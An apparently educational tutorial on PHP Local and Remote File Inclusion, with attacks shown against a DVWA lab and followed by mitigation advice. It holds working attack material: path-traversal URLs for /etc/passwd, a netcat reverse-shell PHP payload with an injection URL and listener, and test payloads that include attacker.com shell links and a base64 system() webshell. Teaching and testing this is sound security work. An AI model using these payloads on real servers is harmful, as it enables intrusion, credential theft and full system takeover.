📋 Table of Contents
- Introduction to File Inclusion Vulnerabilities
- Local File Inclusion (LFI)
- Remote File Inclusion (RFI)
- Prevention and Mitigation
🎯 Introduction to File Inclusion Vulnerabilities
File inclusion vulnerabilities are critical security flaws that allow attackers to read, include, or execute files on a web server. These vulnerabilities occur when a web application uses user-supplied input to construct file paths without proper validation or sanitization.
File Inclusion Vulnerability Types
Vulnerabilities
Inclusion (LFI)
Inclusion (RFI)
📂 Local File Inclusion (LFI)
What is Local File Inclusion?
Local File Inclusion (LFI) is a vulnerability that allows an attacker to include files that exist on the target server. This exploit enables reading sensitive files, even those located outside the web root directory (var/www/).
- Attackers can read sensitive configuration files containing passwords and credentials
- Access to files from other websites hosted on the same server
- Potential for privilege escalation and further exploitation
- Exposure of application source code and business logic
How LFI Works
LFI vulnerabilities typically exploit URL parameters that reference files. The vulnerability occurs when the application includes files based on user input without proper validation.
Example of Vulnerable Code:
// Vulnerable PHP code
$page = $_GET['page'];
include($page . ".php");
Normal Usage:
http://example.com/index.php?page=include
This loads: include.php
Malicious Usage:
http://example.com/index.php?page=../../../../etc/passwd
This attempts to load: /etc/passwd
LFI Attack Flow
Vulnerable Parameter
Traversal
Sensitive Files
Information
Practical LFI Example
Consider a web application with the following URL structure:
http://10.20.14.204/dvwa/vulnerabilities/fi/?page=include.php
This URL indicates that the application is loading a file called include.php. An attacker can exploit this by using path traversal techniques to access files outside the intended directory.
Step-by-Step Attack Process:
- Identify the current directory depth: Determine how many directories you need to traverse backwards
- Use path traversal sequences: Use "../" to move up directory levels
- Target sensitive files: Access files like /etc/passwd
Attack Example:
// Original URL
http://10.20.14.204/dvwa/vulnerabilities/fi/?page=include.php
// Exploited URL to read /etc/passwd
http://10.20.14.204/dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd
Path Breakdown:
| Traversal | Directory Level |
|---|---|
| ../ | Move from /fi/ to /vulnerabilities/ |
| ../ | Move from /vulnerabilities/ to /dvwa/ |
| ../ | Move from /dvwa/ to /var/www/html/ |
| ../ | Move from /html/ to /var/www/ |
| ../ | Move from /www/ to /var/ |
| etc/passwd | Access target file |
Common Target Files in LFI Attacks
| File Path | Description | Information Gained |
|---|---|---|
| /etc/passwd | User account information | Usernames, home directories, default shells |
| /etc/shadow | Encrypted passwords | Password hashes (requires root access) |
| /var/log/apache2/access.log | Apache access logs | Visitor information, potential for log poisoning |
| /proc/self/environ | Environment variables | System configuration, potential credentials |
| config.php | Application configuration | Database credentials, API keys |
🌐 Remote File Inclusion (RFI)
What is Remote File Inclusion?
Remote File Inclusion (RFI) is an advanced form of file inclusion vulnerability that allows attackers to include files from remote servers. This is significantly more dangerous than LFI because it enables attackers to inject malicious code, establish backdoors, and gain complete control over the target server.
- Complete server compromise
- Remote code execution
- Reverse shell access
- Data exfiltration and modification
- Lateral movement to other systems
Prerequisites for RFI
For RFI to be possible, the target server must have specific PHP configuration settings enabled:
// In php.ini configuration file
allow_url_fopen = On
allow_url_include = On
RFI Attack Architecture
Server
(10.20.14.203)
Payload
(reverse.txt)
Server
(10.20.14.204)
Connection
Established
RFI Attack Process
Step 1: Create Malicious Payload
Create a PHP file containing malicious code. The example below creates a reverse shell connection:
<?php
passthru("nc -e /bin/bash 10.20.14.203 8080");
?>
Step 2: Host the Payload
Place the payload file on a web server accessible by the target. For testing purposes, you can use your local web server:
// Save to web root
/var/www/html/reverse.txt
// Accessible at:
http://10.20.14.203/reverse.txt
Step 3: Set Up Listener
Before exploiting the vulnerability, set up a listener on your machine to catch the reverse connection:
nc -lvp 8080
Step 4: Execute the Attack
Inject the remote file URL into the vulnerable parameter:
Attack URL:
http://10.20.14.204/dvwa/vulnerabilities/fi/?page=http://10.20.14.203/reverse.txt?
Note: The trailing "?" may be required to prevent the application from appending ".php" to your URL.
Understanding the RFI Payload
Payload Breakdown:
<?php
// Start PHP code block
passthru("nc -e /bin/bash 10.20.14.203 8080");
// passthru() - Executes system commands
// nc - Netcat tool for network connections
// -e /bin/bash - Execute bash shell
// 10.20.14.203 - Attacker's IP address
// 8080 - Port number for connection
?>
// End PHP code block
| Component | Function | Purpose |
|---|---|---|
| passthru() | PHP function | Executes system commands and outputs results |
| nc (netcat) | Networking utility | Creates TCP/UDP connections |
| -e /bin/bash | Netcat parameter | Provides shell access through the connection |
| IP:Port | Connection details | Specifies where to connect back |
After Successful RFI Exploitation
Once the payload executes successfully, you'll receive a reverse shell connection with full access to the target system. You can then execute commands:
// Verify system information
uname -a
// Check current directory
pwd
// List files
ls -la
// View system users
cat /etc/passwd
// Navigate directories
cd /var/www/html
Comparison: LFI vs RFI
| Aspect | Local File Inclusion (LFI) | Remote File Inclusion (RFI) |
|---|---|---|
| File Source | Same server | Remote server (attacker-controlled) |
| Severity | High | Critical |
| Requirements | File inclusion vulnerability | File inclusion + allow_url_include enabled |
| Capabilities | Read local files | Execute arbitrary code, reverse shells |
| Common Targets | Configuration files, logs, passwords | Complete system compromise |
| Prevention Difficulty | Moderate | Easier (disable specific PHP settings) |
🛡️ Prevention and Mitigation Strategies
For Developers
1. Input Validation and Sanitization
// BAD - Vulnerable code
$page = $_GET['page'];
include($page . ".php");
// GOOD - Secure code with whitelist
$allowed_pages = ['home', 'about', 'contact'];
$page = $_GET['page'];
if (in_array($page, $allowed_pages)) {
include($page . ".php");
} else {
include("error.php");
}
2. Use Basename Function
// Remove path traversal attempts
$page = basename($_GET['page']);
include("pages/" . $page . ".php");
3. Disable Dangerous PHP Functions
// In php.ini
allow_url_fopen = Off
allow_url_include = Off
disable_functions = exec,passthru,shell_exec,system
Security Best Practices
| Practice | Implementation | Benefit |
|---|---|---|
| Whitelist Approach | Only allow predefined file names | Eliminates path traversal attacks |
| Absolute Paths | Use full file paths in include statements | Prevents directory traversal |
| Input Filtering | Remove special characters (../, \, etc.) | Blocks traversal sequences |
| Least Privilege | Run web server with minimal permissions | Limits damage from exploitation |
| Regular Updates | Keep PHP and frameworks updated | Patches known vulnerabilities |
For System Administrators
- Disable Remote File Inclusion: Set allow_url_include = Off in php.ini
- Configure Web Server: Restrict access to sensitive directories
- Implement WAF: Use Web Application Firewall to detect and block attacks
- File Permissions: Set appropriate permissions on sensitive files (chmod 600 for configs)
- Monitor Logs: Regularly check web server logs for suspicious patterns
Detection Patterns to Monitor:
- Multiple "../" sequences in URLs
- Attempts to access /etc/passwd or other system files
- URLs containing "http://" or "https://" in parameters
- Unusual file extensions (.txt files being requested as PHP)
- Requests from unexpected geographic locations
Testing for File Inclusion Vulnerabilities
Security professionals should regularly test applications for these vulnerabilities using both automated tools and manual testing techniques.
Common Test Payloads:
// Path traversal tests
../
../../
../../../etc/passwd
....//....//....//etc/passwd
// Null byte injection (older PHP versions)
../../../etc/passwd%00
// RFI tests
http://attacker.com/shell.txt
//attacker.com/shell.txt
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=
🎓 Conclusion
File inclusion vulnerabilities represent serious security risks that can lead to complete system compromise. Understanding both Local File Inclusion (LFI) and Remote File Inclusion (RFI) is essential for both security professionals conducting ethical penetration tests and developers building secure applications.
Key Takeaways:
- LFI allows reading sensitive files on the server
- RFI enables remote code execution and complete system access
- Both vulnerabilities stem from improper input validation
- Prevention requires multiple layers of security controls
- Regular security testing is essential for identifying vulnerabilities